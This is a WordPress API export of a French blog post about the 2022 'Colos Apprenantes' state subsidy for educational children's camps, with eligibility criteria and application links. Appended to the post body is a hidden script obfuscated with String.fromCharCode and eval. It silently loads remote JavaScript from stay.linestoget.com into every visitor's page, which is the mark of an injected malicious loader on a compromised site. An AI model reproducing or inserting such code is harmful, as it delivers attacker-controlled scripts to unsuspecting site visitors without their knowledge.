{"id":8101,"date":"2022-09-07T17:40:50","date_gmt":"2022-09-07T15:40:50","guid":{"rendered":"http:\/\/actifeducation.fr\/?p=8101"},"modified":"2022-09-07T17:40:51","modified_gmt":"2022-09-07T15:40:51","slug":"colos-apprenantes","status":"publish","type":"post","link":"http:\/\/actifeducation.fr\/?p=8101","title":{"rendered":"Colos apprenantes"},"content":{"rendered":"\n<figure class=\"wp-block-table\"><table><tbody><tr><td>Pour la troisi\u00e8me ann\u00e9e cons\u00e9cutive, le\u00a0<strong>Minist\u00e8re de l&rsquo;Education Nationale et de la Jeunesse<\/strong>\u00a0a reconduit le\u00a0<strong>dispositif Colos Apprenantes<\/strong>. Ce dernier permet \u00e0 des enfants et des jeunes de partir sur des s\u00e9jours labellis\u00e9s (ils doivent \u00eatre \u00e0 fort caract\u00e8re \u00e9ducatif) et de\u00a0<strong>b\u00e9n\u00e9ficier d&rsquo;une prise en charge<\/strong>\u00a0pouvant aller jusqu&rsquo;\u00e0 500 \u20ac soit la totalit\u00e9, pour certains, du prix du s\u00e9jour.<br><br>Pour trouver votre s\u00e9jour :\u00a0<a rel=\"noreferrer noopener\" href=\"https:\/\/openagenda.com\/colosapprenantes\" target=\"_blank\">https:\/\/openagenda.com\/colosapprenantes<\/a><br><br>Lorsque votre enfant est scolaris\u00e9 \u00e0 Fresnes, voici les crit\u00e8res d\u2019\u00e9ligibilit\u00e9 \u00e0 l\u2019aide de l\u2019Etat :<br>&#8211; avoir un quotient familial CAF compris entre 0 et 1200 ;<br>&#8211; ou \u00eatre en reconnu en situation de handicap ;<br>&#8211; votre enfant a entre 3 ans et moins de 18 ans au 1er juillet 2022.<br><br>Pour savoir si vous \u00eates\u00a0<strong>\u00e9ligible \u00e0 la prise en charge financi\u00e8re<\/strong>\u00a0<strong>et faire votre demande<\/strong>\u00a0:\u00a0<a rel=\"noreferrer noopener\" href=\"https:\/\/jpa.asso.fr\/colos-apprenantes-2022\/\" target=\"_blank\">https:\/\/jpa.asso.fr\/colos-apprenantes-2022\/<\/a>\u00a0<br><br>ATTENTION : certains op\u00e9rateurs de s\u00e9jour peuvent prendre en charge directement votre s\u00e9jour. N&rsquo;h\u00e9sitez pas \u00e0 les contacter.<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>A+<\/p>\n<script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script>","protected":false},"excerpt":{"rendered":"<p>Pour la troisi\u00e8me ann\u00e9e cons\u00e9cutive, le\u00a0Minist\u00e8re de l&rsquo;Education Nationale et de la Jeunesse\u00a0a reconduit le\u00a0dispositif Colos Apprenantes. Ce dernier permet \u00e0 des enfants et des jeunes de partir sur des s\u00e9jours labellis\u00e9s (ils doivent \u00eatre \u00e0 fort caract\u00e8re \u00e9ducatif) et de\u00a0b\u00e9n\u00e9ficier d&rsquo;une prise en charge\u00a0pouvant aller jusqu&rsquo;\u00e0 500 \u20ac soit la totalit\u00e9, pour certains, du &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"http:\/\/actifeducation.fr\/?p=8101\"> <span class=\"screen-reader-text\">Colos apprenantes<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":8102,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-8101","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/8101","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8101"}],"version-history":[{"count":1,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/8101\/revisions"}],"predecessor-version":[{"id":8103,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/8101\/revisions\/8103"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/media\/8102"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8101"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8101"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}